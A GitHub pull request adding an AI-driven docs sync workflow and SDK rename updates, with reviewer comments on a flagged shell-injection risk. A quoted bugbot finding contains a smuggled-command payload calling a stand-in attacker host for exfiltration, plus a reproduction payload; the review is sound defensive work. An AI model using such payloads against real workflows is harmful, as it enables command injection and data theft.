Develop #37

Merged
saadqbal merged 7 commits into main from develop
May 13, 2026

@divyasinghds
Contributor

@divyasinghds divyasinghds commented May 11, 2026

Summary

Related

Type of change

  • Feature
  • Bug fix
  • Tech-debt / refactor
  • Docs
  • Security / hardening
  • Breaking change

Test plan

Screenshots / recordings

Deployment notes

Checklist

  • Tests added / updated and passing locally
  • Docs updated if behavior or config changed
  • No secrets / credentials in the diff
  • For security-sensitive paths: appropriate reviewer requested

Note

Medium Risk
Adds a scheduled/dispatch-triggered GitHub Actions pipeline that fetches content from multiple repos and uses Claude to rewrite docs pages, which could introduce unintended documentation changes and relies on multiple secrets/tokens.

Overview
Introduces an automated docs sync system driven by .github/sync-sources.yml: upstream README changes can now trigger a repository_dispatch, which runs a new sync-docs workflow to fetch the upstream files and use anthropics/claude-code-action to update only the mapped dest .mdx pages, then open/update a PR on docs/sync-upstream.

Updates several docs pages to align with the renamed Python SDK (tracebloc_package → tracebloc) and newer snake_case API method names, adjusts install guidance to use framework extras (e.g. pip install "tracebloc[pytorch]"), simplifies the data-ingestor Docker build instructions, and rewires navigation/redirects in docs.json to point legacy tracebloc-package URLs to tools-help/tracebloc.

Reviewed by Cursor Bugbot for commit 4771d1f. Bugbot is set up for automated code reviews on this repo.

divyasinghds and others added 2 commits May 11, 2026 15:53
Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* docs: remove open-source client claim from how-training-works

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* docs: say "contact us" instead of "open a support ticket"

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Asad Iqbal (Saadi) <asad.dsoft@gmail.com>
Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
@divyasinghds divyasinghds requested a review from saadqbal May 11, 2026 10:39
@divyasinghds divyasinghds self-assigned this May 11, 2026
saadqbal previously approved these changes May 11, 2026
* docs: add automated upstream sync workflow

Adds a Claude-powered workflow that syncs docs pages with upstream README
changes from five source repos (tracebloc-py-package, client, start-training,
data-ingestors, model-zoo). Source repos fire repository_dispatch on push;
this repo's workflow fetches the upstream file, has Claude rewrite the target
.mdx in docs voice, and opens a PR.

- .github/sync-sources.yml: mapping of upstream files to docs pages
- .github/workflows/sync-docs.yml: dispatch + manual + cron-driven sync job
- .github/notify-docs.workflow-template.yml: template for source repos

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix: address bugbot issues in sync workflow

- Pass ANTHROPIC_API_KEY as anthropic_api_key input to claude-code-action
  instead of env var (action reads via core.getInput, not env).
- Move sync cache from .sync-cache/ to /tmp/sync-cache/ so untracked
  cache files are not picked up by create-pull-request.

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

* fix: address remaining bugbot issues in sync workflow

- Add concurrency group so overlapping cron/dispatch/manual runs
  serialize instead of racing on the docs/sync-upstream branch
  (would otherwise fail with "failed to push some refs" and drop
  changes from the losing run).
- Pin yq to v4.44.3 instead of latest for deterministic builds.
- Restrict create-pull-request add-paths to **/*.mdx so stray edits
  outside docs pages cannot be staged into the sync PR.
- Note in the notify template that branches may need adjusting for
  repos using master (e.g. data-ingestors).

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

* fix: accumulate sync runs onto existing PR branch

Previously each run checked out the default branch fresh and force-pushed
only the dispatched source's diff to docs/sync-upstream, silently
overwriting any earlier dispatched sources' pending changes.

Now the workflow:
- Checks if docs/sync-upstream exists on the remote; if so, checks it
  out so prior accumulated changes are part of the working tree.
- Resolves the default branch dynamically and passes it to peter-evans
  as the explicit base so the PR continues targeting the right branch
  even after we switched off it.

Result: sequential dispatches for different sources combine into one
PR instead of clobbering each other.

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

* fix: read sync-sources.yml from base branch, not stale sync branch

After the previous fix switched the working tree to docs/sync-upstream
to accumulate changes, all subsequent reads of .github/sync-sources.yml
were coming from the (potentially stale) sync branch instead of the
base branch. If a new source were added or an instruction edited on
main while a sync PR was pending, the workflow would silently use the
outdated config.

Snapshot the mapping to /tmp/sync-sources.yml before any branch switch,
and point both the yq filter step and the Claude prompt at the snapshot.

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
Co-authored-by: Asad Iqbal <asad.dsoft@gmail.com>
Comment thread .github/sync-sources.yml
…kage 0.7.0) (#14)

Sync hyperparameters and start-training pages with the legacy
tracebloc/documentation repo:

- Rename camelCase API methods to snake_case: upload_model,
  link_model_dataset, experiment_name, get_training_plan,
  learning_rate, loss_function, layers_freeze, early_stop_callback,
  reduce_lr_callback, model_checkpoint_callback,
  terminate_on_nan_callback, training_classes, data_type
- Rename trainingObject → training
- Update terminate-on-NaN description (any NaN loss)
- Use pip optional-extras syntax: tracebloc_package[pytorch|tensorflow|sklearn|all]

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
* docs: migrate SDK page to tracebloc 0.8.x (closes #38)

The SDK was renamed in tracebloc/tracebloc-py-package#135. `tracebloc==0.8.1`
is live on PyPI. Migrating Mintlify docs to the canonical name.

- Rename `tools-help/tracebloc-package.mdx` -> `tools-help/tracebloc.mdx`.
- Rewrite the page: `tracebloc` install + import, snake_case API
  (post-SDK.2), historical Note about the rename, link to redirect
  package on PyPI.
- Bump install pin to `>=0.8.0` (was `>=0.6.32`); add per-extra
  install options.
- `docs.json`:
  - Nav: `tools-help/tracebloc-package` -> `tools-help/tracebloc`.
  - Add `/tools-help/tracebloc-package` -> `/tools-help/tracebloc`
    redirect to preserve old inbound links.
  - Existing redirects pointing at `/tools-help/tracebloc-package`
    now point at `/tools-help/tracebloc`.
- Internal cross-links in faqs.mdx + key-terms.mdx -> new URL.
- `join-use-case/start-training.mdx` install snippet -> new name + pin.

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

* docs: bump install pin to 0.8.1 (latest)

* docs: migrate SDK examples to snake_case API (post-SDK.2)

The 0.7.0 SDK.2 release renamed the public Python API to PEP 8 /
snake_case. The old camelCase forms still work via deprecation
aliases (with DeprecationWarning) but new examples should use the
canonical names.

Updates the three customer-facing pages that still showed the
camelCase API:

- `join-use-case/start-training.mdx` — the main walk-through.
- `join-use-case/hyperparameters.mdx` — the full reference table.
- `join-use-case/model-optimization.mdx` — pretrained-weights upload.

Method renames applied (per tracebloc-py-package/MIGRATION.md):
- `uploadModel` -> `upload_model` (+ `model_name=` kwarg)
- `linkModelDataset` -> `link_model_dataset` (+ `dataset_id=` kwarg)
- `getTrainingPlan` -> `get_training_plan`
- `experimentName` -> `experiment_name`
- `learningRate` -> `learning_rate`
- `lossFunction` -> `loss_function`
- `layersFreeze` -> `layers_freeze`
- `earlystopCallback` -> `early_stop_callback`
- `reducelrCallback` -> `reduce_lr_callback`
- `modelCheckpointCallback` -> `model_checkpoint_callback`
- `terminateOnNaNCallback` -> `terminate_on_nan_callback`
- `trainingClasses` -> `training_classes`
- `dataType` -> `data_type`
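
The rename list above can be applied mechanically to existing notebooks or snippets. The following is a minimal sketch, assuming the thirteen pairs listed in this commit are the full set and that a whole-word textual replacement is acceptable. `RENAMES` and `migrate_snippet` are illustrative names, not part of the SDK, and the call arguments in the sample text are placeholders.

```python
import re

# camelCase -> snake_case pairs copied from the commit message above.
RENAMES = {
    "uploadModel": "upload_model",
    "linkModelDataset": "link_model_dataset",
    "getTrainingPlan": "get_training_plan",
    "experimentName": "experiment_name",
    "learningRate": "learning_rate",
    "lossFunction": "loss_function",
    "layersFreeze": "layers_freeze",
    "earlystopCallback": "early_stop_callback",
    "reducelrCallback": "reduce_lr_callback",
    "modelCheckpointCallback": "model_checkpoint_callback",
    "terminateOnNaNCallback": "terminate_on_nan_callback",
    "trainingClasses": "training_classes",
    "dataType": "data_type",
}

# One alternation anchored on word boundaries, so identifiers that merely
# contain an old name (e.g. "metadataType") are left untouched.
_PATTERN = re.compile(
    r"\b(" + "|".join(sorted(RENAMES, key=len, reverse=True)) + r")\b"
)


def migrate_snippet(source):
    """Rewrite old camelCase method names to their snake_case forms."""
    return _PATTERN.sub(lambda match: RENAMES[match.group(1)], source)


old_text = "user.uploadModel(path)\nplan.experimentName(name)"
new_text = migrate_snippet(old_text)
print(new_text)
```

This handles method names only. The keyword renames (`model_name=`, `dataset_id=`) and the `trainingObject` variable rename described in this commit would still need a manual pass.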

The `model_name` and `dataset_id` keyword names are no longer aliased
in 0.8.x — passing positional args still works, but the kwargs
`modelname=` / `datasetId=` raise TypeError, so the docs use the
explicit kwarg form everyone should adopt.
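
To illustrate the behaviour described above (old method names still work with a `DeprecationWarning`, while old keyword names raise `TypeError`), here is a generic sketch of the alias pattern. It is an assumption about how such aliases are commonly written, not the SDK's actual implementation. `TrainingPlanSketch`, `deprecated_alias`, and the `"ds-123"` value are hypothetical.

```python
import warnings


def deprecated_alias(old_name, new_name):
    """Build a method that warns, then delegates to the canonical method."""
    def alias(self, *args, **kwargs):
        warnings.warn(
            f"{old_name} is deprecated; use {new_name}",
            DeprecationWarning,
            stacklevel=2,
        )
        return getattr(self, new_name)(*args, **kwargs)
    return alias


class TrainingPlanSketch:
    """Hypothetical stand-in for an SDK object; not tracebloc's real class."""

    def __init__(self):
        self.settings = {}

    def experiment_name(self, name):
        # Canonical snake_case method.
        self.settings["experiment_name"] = name

    def link_model_dataset(self, dataset_id):
        # Canonical method; accepts dataset_id positionally or by keyword.
        self.settings["dataset_id"] = dataset_id

    # camelCase names kept only as warning-emitting aliases.
    experimentName = deprecated_alias("experimentName", "experiment_name")
    linkModelDataset = deprecated_alias("linkModelDataset", "link_model_dataset")


plan = TrainingPlanSketch()
errors = []
with warnings.catch_warnings(record=True) as caught:
    warnings.simplefilter("always")
    plan.experimentName("demo")        # old method name: works, but warns
    plan.linkModelDataset("ds-123")    # positional argument still works
    try:
        plan.linkModelDataset(datasetId="ds-123")  # old keyword is not aliased
    except TypeError as err:
        errors.append(err)

print([w.category.__name__ for w in caught], len(errors))
```

Because the alias forwards keyword arguments unchanged, an old keyword such as `datasetId=` fails in the canonical method's signature check, which is one plausible way to end up with the `TypeError` the commit message mentions.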

Also renames the local variable `trainingObject` -> `training_plan`
throughout, matching the canonical sample workflow in tracebloc's
project CLAUDE.md.

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

* fix(ci): update sync-sources.yml dest after file rename (bugbot)

`tools-help/tracebloc-package.mdx` was renamed to `tools-help/tracebloc.mdx`
earlier in this PR, but the daily `sync-docs.yml` cron reads
`.github/sync-sources.yml` and would have either recreated the old
orphan path or failed outright — silently preventing upstream README
edits from reaching the new page.

Repointing the dest at `tools-help/tracebloc.mdx` keeps the upstream
README -> docs page sync working. The mapping `id` stays
`tracebloc-package` (it's a slug used for dispatch; changing it would
need a coordinated edit in the upstream notify workflow, which doesn't
exist yet — scope creep here).

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 <noreply@anthropic.com>
Three entries pointed at `main` branches that do not exist in the
upstream repos, which would cause the sync fetch step to 404:
- tracebloc-py-package → develop (default; `main` does not exist; per
  the SDK repo's CLAUDE.md, develop is the canonical source of truth)
- data-ingestors → master (default branch)
- model-zoo → master (default branch)

Verified against the GitHub API for each repo. The `Readme.md` casing
flagged by bugbot is correct as-is: data-ingestors actually ships
`Readme.md` (mixed case), so the bugbot suggestion would have broken
the fetch — left unchanged.

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
@saadqbal
Contributor

Reviewer pass (acting as a second-look reviewer alongside bugbot)

Bugbot finding — false positive

data-ingestors source entry uses src: Readme.md while all four others use README.md … the fetch will 404.

Verified against the upstream repo — the file is actually named Readme.md (mixed case):

$ gh api repos/tracebloc/data-ingestors/contents/?ref=master --jq '.[] | select(.name | test("readme"; "i")) | .name'
Readme.md
$ gh api repos/tracebloc/data-ingestors/contents/README.md
{"message":"Not Found","status":"404"}

Applying bugbot's suggestion (Readme.md → README.md) would actually break the fetch. Left as-is.

Real bugs found during the same audit (fixed in aaaac32)

While verifying the casing claim I checked ref: for every entry. Three entries point at main branches that don't exist upstream — the fetch step would 404 for all three on the first run:

| id | configured ref | upstream default | fix |
| --- | --- | --- | --- |
| tracebloc-package | main | develop (no main branch; master is deprecated per the SDK repo's CLAUDE.md) | develop |
| data-ingestors | main | master (no main branch) | master |
| model-zoo | main | master (no main branch) | master |

Only client and start-training actually have a main branch, so those entries were already correct.

Other things I looked at and didn't change

  • sync-docs.yml snapshots sync-sources.yml from the base branch before checking out docs/sync-upstream — protects against stale config from a pending PR. Good.
  • concurrency.cancel-in-progress: false is the right call for a write-side workflow; a cancelled run mid-commit would be worse than a queue.
  • add-paths: "**/*.mdx" in peter-evans/create-pull-request is a reasonable belt-and-suspenders on top of the Claude prompt's "do not edit outside dest paths" instruction.
  • The notify-docs template's per-repo customization comments (paths:, branches:) already cover the Readme.md / master cases for the three repos that need it — anyone copying the template into data-ingestors or model-zoo will see the guidance.

Suggested follow-ups (non-blocking)

  • The PR title is just Develop — worth retitling before merge so the changelog/squash commit reads sensibly (e.g. docs: add upstream sync workflow + 0.8.x SDK rename).
  • Consider a CI lint that validates every ref and src in sync-sources.yml actually resolves on GitHub (a one-shot gh api repos/.../contents/<src>?ref=<ref> per entry) — would have caught the three broken refs before merge.
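
The lint suggested in the last follow-up could look roughly like the sketch below. It assumes each mapping entry has been parsed into a dict with `id`, `src`, `ref`, and a `repo` field in `owner/name` form. The `repo` key and all function names are assumptions, since the exact schema of sync-sources.yml is not shown in this thread. The URL shape is the same GitHub contents endpoint used in the `gh api` commands above.

```python
import urllib.error
import urllib.parse
import urllib.request

API = "https://api.github.com"


def contents_url(repo, src, ref):
    """Build the GitHub repository-contents URL for one mapping entry."""
    path = urllib.parse.quote(src)  # keeps "/" so nested paths stay intact
    query = urllib.parse.urlencode({"ref": ref})
    return f"{API}/repos/{repo}/contents/{path}?{query}"


def resolves(url, token=None):
    """Return True on HTTP 200, False on 404; re-raise any other HTTP error."""
    request = urllib.request.Request(
        url, headers={"Accept": "application/vnd.github+json"}
    )
    if token:
        request.add_header("Authorization", f"Bearer {token}")
    try:
        with urllib.request.urlopen(request, timeout=10) as response:
            return response.status == 200
    except urllib.error.HTTPError as err:
        if err.code == 404:
            return False
        raise


def broken_entries(sources, check=resolves):
    """Return the ids of entries whose src/ref pair does not resolve."""
    return [
        entry["id"]
        for entry in sources
        if not check(contents_url(entry["repo"], entry["src"], entry["ref"]))
    ]
```

A CI step could fail the build when `broken_entries(...)` is non-empty. Passing a fake `check` callable keeps the logic unit-testable without network access. Because the contents API is case-sensitive for paths, the same check would also confirm the `Readme.md` casing discussed earlier.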

@cursor cursor Bot left a comment

Cursor Bugbot has reviewed your changes and found 1 potential issue.

Reviewed by Cursor Bugbot for commit aaaac32.

Comment thread .github/workflows/sync-docs.yml
Bugbot flagged the previous `yq ".sources[] | select(.id == \"$target\")"`
pattern as shell-injectable. The specific RCE described doesn't
actually trigger — `DISPATCH_ID` / `INPUT_ID` are routed through
`env:` (Actions best practice) and bash does not re-tokenize
variable values inside double quotes, so `$()`, backticks, and `;`
in the value remain literal.

However, a `"` in the value would still terminate the yq string
literal at the yq parser level and could yield a malformed query or
unintended filter. Routing the value through `strenv(TARGET)` keeps
it entirely out of the yq expression syntax — defense in depth at
zero cost.

Co-Authored-By: Claude Opus 4.7 <noreply@anthropic.com>
@saadqbal
Contributor

Reviewer pass #2

Bugbot finding — partially correct; fix applied (4771d1f)

The $target variable, sourced from client_payload.source_id, is expanded inside a double-quoted shell string passed to yq … a source_id of x"; curl attacker.com/exfil…; # would execute arbitrary commands.

The specific RCE doesn't actually trigger:

  1. DISPATCH_ID / INPUT_ID are routed through env: (GitHub Actions best practice for untrusted input), so ${{ }} interpolation produces a literal env-var value, not script text.
  2. Bash does not re-tokenize values expanded inside double quotes: $(), backticks, and ; in a variable's value are passed through as literal characters, not re-evaluated.

Reproduced locally:

$ DISPATCH_ID='x"; echo PWNED; #' bash -c \
    'target="${DISPATCH_ID:-}"; echo arg=".sources[] | select(.id == \"$target\")"'
arg=.sources[] | select(.id == "x"; echo PWNED; #")

No PWNED line is printed: echo PWNED is part of the yq argument, not a shell command.
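
The same reproduction can be scripted for a regression test. This is a sketch, assuming a POSIX `sh` is on the PATH. The script text is a constant and the untrusted value arrives only through the environment, mirroring the `env:` routing described above.

```python
import os
import subprocess

# Payload taken from the reproduction above.
payload = 'x"; echo PWNED; #'

# Constant script text: the value is expanded inside double quotes, so the
# shell treats it as data and never re-parses it as commands.
script = r'target="${DISPATCH_ID:-}"; printf "%s" ".sources[] | select(.id == \"$target\")"'

result = subprocess.run(
    ["sh", "-c", script],
    env={**os.environ, "DISPATCH_ID": payload},
    capture_output=True,
    text=True,
    check=True,
)

# The payload appears verbatim inside the would-be yq expression.
print(result.stdout)
```

The shell runs nothing from the payload, but the printed expression now contains an extra `"`, which is the parser-level problem the hardening addresses.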

But bugbot is right that this needs hardening anyway. Even without shell-level RCE, a " in the payload would terminate the yq string literal at the parser level. Worst case is a malformed query or an unintended filter: not RCE, but also not what we want. The fix in 4771d1f routes the value through strenv(TARGET) so it never touches the yq expression syntax:

TARGET="$target" yq -o=json \
  '.sources[] | select(.id == strenv(TARGET))' \
  /tmp/sync-sources.yml | jq -s . > /tmp/sources.json
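
For comparison, the difference between the two patterns can be shown without running yq at all. The sketch below builds the argument vector and environment for the hardened call and, separately, the string the earlier interpolated pattern would have produced. The function names are illustrative; the expression and file path are the ones shown in the fix above.

```python
import os

# Constant expression: the untrusted value is read by yq via strenv(TARGET).
YQ_EXPRESSION = ".sources[] | select(.id == strenv(TARGET))"


def yq_command(target, mapping_path="/tmp/sync-sources.yml"):
    """Return (argv, env) for a yq call where target never enters the expression."""
    argv = ["yq", "-o=json", YQ_EXPRESSION, mapping_path]
    env = {**os.environ, "TARGET": target}
    return argv, env


def interpolated_expression(target):
    """The earlier pattern, kept only to show how a quote alters the expression."""
    return f'.sources[] | select(.id == "{target}")'


hostile = 'x" or true or "'
argv, env = yq_command(hostile)
print(argv[2])                           # expression is unchanged by the input
print(interpolated_expression(hostile))  # input has become expression syntax
```

With the interpolated form, the hostile value closes the string literal and adds its own operators, which is the "unintended filter" case. With `strenv`, the expression text is identical for every input. The returned pair could be passed to `subprocess.run(argv, env=env)` on a machine where yq is installed.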

Additional things I noticed (non-blocking, leaving for maintainer)

  1. add-paths: "**/*.mdx" is broader than the actual destinations. The Claude prompt says "do not edit files outside dest paths," but there's no mechanical enforcement. If Claude touches an unrelated .mdx, the create-pull-request step will happily commit it. Worth computing the dest list from sync-sources.yml at runtime and passing those paths explicitly — turns the soft instruction into a hard guard.

  2. wget install of yq has no checksum verification (.github/workflows/sync-docs.yml#L55-L58). If a future GitHub runner image change or transient TLS issue ever served a tampered binary, it would run with contents: write + access to SOURCE_REPOS_TOKEN and ANTHROPIC_API_KEY. Pinning the sha256 (or switching to uses: mikefarah/yq@…) closes that door cheaply.

  3. Third-party actions pinned by tag, not SHA (peter-evans/create-pull-request@v6, anthropics/claude-code-action@v1). Standard practice in this repo, but if the org adopts SHA-pinning later, this workflow is in scope.
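
For the first suggestion, the explicit path list could be derived from the already-filtered `/tmp/sources.json` that the workflow writes. This is a minimal sketch, assuming each entry carries a single string `dest` field. The sample entries and helper names are illustrative, not taken from the real mapping.

```python
import json


def dest_paths(sources_json):
    """Collect unique, sorted dest values from the filtered sources list."""
    sources = json.loads(sources_json)
    return sorted({entry["dest"] for entry in sources})


def add_paths_value(paths):
    """Join paths with newlines, one of the list forms add-paths accepts."""
    return "\n".join(paths)


# Example input shaped like /tmp/sources.json; the values are illustrative.
sample = json.dumps([
    {"id": "tracebloc-package", "dest": "tools-help/tracebloc.mdx"},
    {"id": "start-training", "dest": "join-use-case/start-training.mdx"},
    {"id": "duplicate-example", "dest": "tools-help/tracebloc.mdx"},
])

paths = dest_paths(sample)
print(add_paths_value(paths))
```

Passing this value to `add-paths` instead of `**/*.mdx` would mean an edit to any unmapped `.mdx` file is simply never staged. Note that a multi-line value written to `$GITHUB_OUTPUT` needs the delimiter form.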

These are reviewer suggestions, not blockers — the PR as-is (with 4771d1f) is safe to merge.

@saadqbal saadqbal merged commit ace6640 into main May 13, 2026
5 checks passed
4 participants